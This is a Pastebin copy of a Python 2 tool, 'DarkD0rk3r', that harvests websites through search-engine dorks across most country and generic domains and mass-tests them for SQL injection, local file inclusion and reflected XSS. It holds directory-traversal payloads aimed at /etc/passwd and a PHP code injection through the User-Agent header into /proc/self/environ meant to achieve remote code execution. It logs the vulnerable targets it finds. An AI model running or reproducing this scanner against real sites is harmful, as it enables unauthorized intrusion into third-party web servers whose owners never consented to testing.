Advertisement
Topol

DarkD0rk3r 0.7

Aug 29th, 2012
315
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 19.36 KB | None | 0 0
  1.     #!/usr/bin/python
  2.     # This was written for educational purpose and pentest only. Use it at your own risk.
  3.     # Author will be not responsible for any damage!
  4.     # !!! Special greetz for my friend sinner_01 !!!
  5.     # Toolname        : darkd0rk3r.py
  6.     # Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
  7.     # Version         : 0.7
  8.     # Greetz for rsauron and low1z, great python coders
  9.     # greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org
  10.     #
  11.      
  12.     import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
  13.     from random import choice
  14.      
  15.     # Colours
  16.     W  = "\033[0m";  
  17.     R  = "\033[31m";
  18.     G  = "\033[32m";
  19.     O  = "\033[33m";
  20.     B  = "\033[34m";
  21.      
  22.      
  23.     # Banner
  24.     def logo():
  25.             print R+"\n|---------------------------------------------------------------|"
  26.             print "| b4ltazar[@]gmail[dot]com                                      |"
  27.             print "|   02/2012     darkd0rk3r.py  v.0.7                            |"
  28.             print "|    b4ltazar.wordpress.com    &   ljuska.org                   |"
  29.             print "|                                                               |"
  30.             print "|---------------------------------------------------------------|\n"
  31.             print W
  32.      
  33.     if sys.platform == 'linux' or sys.platform == 'linux2':
  34.       subprocess.call("clear", shell=True)
  35.       logo()
  36.      
  37.     else:
  38.       subprocess.call("cls", shell=True)
  39.       logo()
  40.      
  41.     log = "darkd0rk3r-sqli.txt"
  42.     logfile = open(log, "a")
  43.     lfi_log = "darkd0rk3r-lfi.txt"
  44.     lfi_log_file = open(lfi_log, "a")
  45.     rce_log = "darkd0rk3r-rce.txt"
  46.     rce_log_file = open(rce_log, "a")
  47.     xss_log = "darkd0rk3r-xss.txt"
  48.     xss_log_file = open(xss_log, "a")
  49.      
  50.     threads = []
  51.     finallist = []
  52.     vuln = []
  53.     timeout = 300
  54.     socket.setdefaulttimeout(timeout)
  55.      
  56.      
  57.      
  58.                
  59.     lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
  60.      
  61.     xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]
  62.      
  63.     sqlerrors = {'MySQL': 'error in your SQL syntax',
  64.                  'MiscError': 'mysql_fetch',
  65.                  'MiscError2': 'num_rows',
  66.                  'Oracle': 'ORA-01756',
  67.                  'JDBC_CFM': 'Error Executing Database Query',
  68.                  'JDBC_CFM2': 'SQLServer JDBC Driver',
  69.                  'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
  70.                  'MSSQL_Uqm': 'Unclosed quotation mark',
  71.                  'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
  72.                  'MS-Access_JETdb': 'Microsoft JET Database',
  73.                  'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
  74.                  'Server Error' : 'Server Error',
  75.                  'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
  76.                  'Invalid Querystring' : 'Invalid Querystring',
  77.                  'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
  78.                  'VBScript Runtime' : 'VBScript Runtime',
  79.                  'ADODB.Field' : 'ADODB.Field',
  80.                  'BOF or EOF' : 'BOF or EOF',
  81.                  'ADODB.Command' : 'ADODB.Command',
  82.                  'JET Database' : 'JET Database',
  83.                  'mysql_fetch_array()' : 'mysql_fetch_array()',
  84.                  'Syntax error' : 'Syntax error',
  85.                  'mysql_numrows()' : 'mysql_numrows()',
  86.                  'GetArray()' : 'GetArray()',
  87.                  'FetchRow()' : 'FetchRow()',
  88.                  'Input string was not in a correct format' : 'Input string was not in a correct format',
  89.                  'Not found' : 'Not found'}
  90.                  
  91.      
  92.     header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
  93.               'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
  94.               'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
  95.               'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  96.               'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  97.               'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
  98.               'Microsoft Internet Explorer/4.0b1 (Windows 95)',
  99.               'Opera/8.00 (Windows NT 5.1; U; en)',
  100.               'amaya/9.51 libwww/5.4.0',
  101.               'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
  102.               'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
  103.               'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
  104.               'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
  105.               'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
  106.               'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
  107.              
  108.              
  109.     domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',
  110.                'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb',
  111.                'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo',
  112.                'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd',
  113.                'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr',
  114.                'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do',
  115.                'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi',
  116.                'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf',
  117.                'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs',
  118.                'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu',
  119.                'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it',
  120.                'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn',
  121.                'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk',
  122.                'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me',
  123.                'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr',
  124.                'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc',
  125.                'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz',
  126.                'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn',
  127.                'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru',
  128.                'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj',
  129.                'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy',
  130.                'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm',
  131.                'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug',
  132.                'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi',
  133.                'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com',
  134.                'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel',
  135.                'name', 'aero', 'asia', 'cat', 'coop', 'jobs', 'mobi', 'museum',
  136.                'pro', 'travel'],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr',
  137.                'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil',
  138.                'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia',
  139.                'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']}
  140.                
  141.      
  142.     stecnt = 0
  143.     for k,v in domains.items():
  144.       stecnt += 1
  145.       print str(stecnt)+" - "+k
  146.     sitekey = raw_input("\nChoose your target   : ")
  147.     sitearray = domains[domains.keys()[int(sitekey)-1]]
  148.        
  149.      
  150.     inurl = raw_input('\nEnter your dork      : ')
  151.     numthreads = raw_input('Enter no. of threads : ')
  152.     maxc = raw_input('Enter no. of pages   : ')
  153.     print "\nNumber of SQL errors :",len(sqlerrors)
  154.     print "Number of LFI paths  :",len(lfis)
  155.     print "Number of XSS cheats :",len(xsses)
  156.     print "Number of headers    :",len(header)
  157.     print "Number of threads    :",numthreads
  158.     print "Number of pages      :",maxc
  159.     print "Timeout in seconds   :",timeout
  160.     print ""
  161.      
  162.      
  163.      
  164.      
  165.     def search(inurl, maxc):
  166.       urls = []
  167.       for site in sitearray:
  168.         page = 0
  169.         try:
  170.           while page < int(maxc):
  171.             jar = cookielib.FileCookieJar("cookies")
  172.             query = inurl+"+site:"+site
  173.             results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
  174.             request_web =urllib2.Request(results_web)
  175.             agent = random.choice(header)
  176.             request_web.add_header('User-Agent', agent)
  177.             opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
  178.             text = opener_web.open(request_web).read()
  179.             stringreg = re.compile('(?<=href=")(.*?)(?=")')
  180.             names = stringreg.findall(text)
  181.             page += 1
  182.             for name in names:
  183.               if name not in urls:
  184.                 if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
  185.                   pass
  186.                 elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
  187.                   pass
  188.                 else:
  189.                   urls.append(name)
  190.             percent = int((1.0*page/int(maxc))*100)
  191.             urls_len = len(urls)
  192.             sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
  193.             sys.stdout.flush()
  194.         except(KeyboardInterrupt):
  195.           pass
  196.       tmplist = []
  197.       print "\n\n[+] URLS (unsorted): ",len(urls)
  198.       for url in urls:
  199.         try:
  200.           host = url.split("/",3)
  201.           domain = host[2]
  202.           if domain not in tmplist and "=" in url:
  203.             finallist.append(url)
  204.             tmplist.append(domain)
  205.            
  206.         except:
  207.           pass
  208.       print "[+] URLS (sorted)  : ",len(finallist)
  209.       return finallist
  210.      
  211.      
  212.     class injThread(threading.Thread):
  213.             def __init__(self,hosts):
  214.                     self.hosts=hosts
  215.                     self.fcount = 0
  216.                     self.check = True
  217.                     threading.Thread.__init__(self)
  218.      
  219.             def run (self):
  220.                     urls = list(self.hosts)
  221.                     for url in urls:
  222.                             try:
  223.                                     if self.check == True:
  224.                                             ClassicINJ(url)
  225.                                     else:
  226.                                             break
  227.                             except(KeyboardInterrupt,ValueError):
  228.                                     pass
  229.                     self.fcount+=1
  230.      
  231.             def stop(self):
  232.                     self.check = False
  233.                    
  234.     class lfiThread(threading.Thread):
  235.             def __init__(self,hosts):
  236.                     self.hosts=hosts
  237.                     self.fcount = 0
  238.                     self.check = True
  239.                     threading.Thread.__init__(self)
  240.      
  241.             def run (self):
  242.                     urls = list(self.hosts)
  243.                     for url in urls:
  244.                             try:
  245.                                     if self.check == True:
  246.                                             ClassicLFI(url)
  247.                                     else:
  248.                                             break
  249.                             except(KeyboardInterrupt,ValueError):
  250.                                     pass
  251.                     self.fcount+=1
  252.      
  253.             def stop(self):
  254.                     self.check = False
  255.                    
  256.     class xssThread(threading.Thread):
  257.             def __init__(self,hosts):
  258.                     self.hosts=hosts
  259.                     self.fcount = 0
  260.                     self.check = True
  261.                     threading.Thread.__init__(self)
  262.      
  263.             def run (self):
  264.                     urls = list(self.hosts)
  265.                     for url in urls:
  266.                             try:
  267.                                     if self.check == True:
  268.                                             ClassicXSS(url)
  269.                                     else:
  270.                                             break
  271.                             except(KeyboardInterrupt,ValueError):
  272.                                     pass
  273.                     self.fcount+=1
  274.      
  275.             def stop(self):
  276.                     self.check = False
  277.                    
  278.                    
  279.     def ClassicINJ(url):
  280.             EXT = "'"
  281.             host = url+EXT
  282.             try:
  283.                     source = urllib2.urlopen(host).read()
  284.                     for type,eMSG in sqlerrors.items():
  285.                             if re.search(eMSG, source):
  286.                                     print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
  287.                                     logfile.write("\n"+host)
  288.                                     vuln.append(host)
  289.                                    
  290.                                    
  291.                             else:
  292.                                     pass
  293.             except:
  294.                     pass
  295.      
  296.      
  297.     def ClassicLFI(url):
  298.       lfiurl = url.rsplit('=', 1)[0]
  299.       if lfiurl[-1] != "=":
  300.         lfiurl = lfiurl + "="
  301.       for lfi in lfis:
  302.         try:
  303.           check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
  304.           if re.findall("root:x", check):
  305.             print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
  306.             lfi_log_file.write("\n"+lfiurl+lfi)
  307.             vuln.append(lfiurl+lfi)
  308.             target = lfiurl+lfi
  309.             target = target.replace("/etc/passwd","/proc/self/environ")
  310.             header = "<? echo md5(baltazar); ?>"
  311.             try:
  312.               request_web = urllib2.Request(target)
  313.               request_web.add_header('User-Agent', header)
  314.               text = urllib2.urlopen(request_web)
  315.               text = text.read()
  316.               if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
  317.                 print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
  318.                 rce_log_file.write("\n",target)
  319.                 vuln.append(target)
  320.             except:
  321.               pass
  322.            
  323.         except:
  324.           pass
  325.      
  326.     def ClassicXSS(url):
  327.       for xss in xsses:
  328.         try:
  329.           source = urllib2.urlopen(url+xss.replace("\n","")).read()
  330.           if re.findall("XSS by baltazar", source):
  331.             print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
  332.             xss_log_file.write("\n"+url+xss)
  333.             vuln.append(url+xss)
  334.         except:
  335.           pass
  336.      
  337.     def injtest():
  338.       print B+"\n[+] Preparing for SQLi scanning ..."
  339.       print "[+] Can take a while ..."
  340.       print "[!] Working ...\n"
  341.       i = len(usearch) / int(numthreads)
  342.       m = len(usearch) % int(numthreads)
  343.       z = 0
  344.       if len(threads) <= numthreads:
  345.         for x in range(0, int(numthreads)):
  346.           sliced = usearch[x*i:(x+1)*i]
  347.           if (z<m):
  348.             sliced.append(usearch[int(numthreads)*i+z])
  349.             z +=1
  350.           thread = injThread(sliced)
  351.           thread.start()
  352.           threads.append(thread)
  353.         for thread in threads:
  354.           thread.join()
  355.          
  356.     def lfitest():
  357.       print B+"\n[+] Preparing for LFI - RCE scanning ..."
  358.       print "[+] Can take a while ..."
  359.       print "[!] Working ...\n"
  360.       i = len(usearch) / int(numthreads)
  361.       m = len(usearch) % int(numthreads)
  362.       z = 0
  363.       if len(threads) <= numthreads:
  364.         for x in range(0, int(numthreads)):
  365.           sliced = usearch[x*i:(x+1)*i]
  366.           if (z<m):
  367.             sliced.append(usearch[int(numthreads)*i+z])
  368.             z +=1
  369.           thread = lfiThread(sliced)
  370.           thread.start()
  371.           threads.append(thread)
  372.         for thread in threads:
  373.           thread.join()
  374.      
  375.     def xsstest():
  376.       print B+"\n[+] Preparing for XSS scanning ..."
  377.       print "[+] Can take a while ..."
  378.       print "[!] Working ...\n"
  379.       i = len(usearch) / int(numthreads)
  380.       m = len(usearch) % int(numthreads)
  381.       z = 0
  382.       if len(threads) <= numthreads:
  383.         for x in range(0, int(numthreads)):
  384.           sliced = usearch[x*i:(x+1)*i]
  385.           if (z<m):
  386.             sliced.append(usearch[int(numthreads)*i+z])
  387.             z +=1
  388.           thread = xssThread(sliced)
  389.           thread.start()
  390.           threads.append(thread)
  391.         for thread in threads:
  392.           thread.join()
  393.      
  394.     usearch = search(inurl,maxc)
  395.     menu = True
  396.     while menu == True:
  397.       print R+"\n[1] SQLi Testing"
  398.       print "[2] LFI - RCE Testing"
  399.       print "[3] XSS Testing"
  400.       print "[4] SQLi and LFI - RCE Testing"
  401.       print "[5] SQLi and XSS Testing"
  402.       print "[6] LFI -RCE and XSS Testing"
  403.       print "[7] SQLi,LFI - RCE and XSS Testing"
  404.       print "[8] Save valid urls to file"
  405.       print "[9] Print valid urls"
  406.       print "[10] Found vuln in last scan"
  407.       print "[0] Exit\n"
  408.       chce = raw_input(":")
  409.       if chce == '1':
  410.         injtest()
  411.          
  412.       if chce == '2':
  413.         lfitest()
  414.      
  415.       if chce == '3':
  416.         xsstest()
  417.        
  418.       if chce == '4':
  419.         injtest()
  420.         lfitest()
  421.          
  422.       if chce == '5':
  423.         injtest()
  424.         xsstest()
  425.        
  426.       if chce == '6':
  427.         lfitest()
  428.         xsstest()
  429.        
  430.       if chce == '7':
  431.         injtest()
  432.         lfitest()
  433.         xsstest()
  434.        
  435.       if chce == '8':
  436.         print B+"\nSaving valid urls ("+str(len(finallist))+") to file"
  437.         listname = raw_input("Filename: ")
  438.         list_name = open(listname, "w")
  439.         finallist.sort()
  440.         for t in finallist:
  441.           list_name.write(t+"\n")
  442.         list_name.close()
  443.         print "Urls saved, please check", listname
  444.        
  445.       if chce == '9':
  446.         print W+"\nPrinting valid urls:\n"
  447.         finallist.sort()
  448.         for t in finallist:
  449.           print B+t
  450.          
  451.       if chce == '10':
  452.         print B+"\nVuln found ",len(vuln)
  453.      
  454.       if chce == '0':
  455.         print R+"\n[-] Exiting ..."
  456.         mnu = False
  457.         sys.exit(1)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement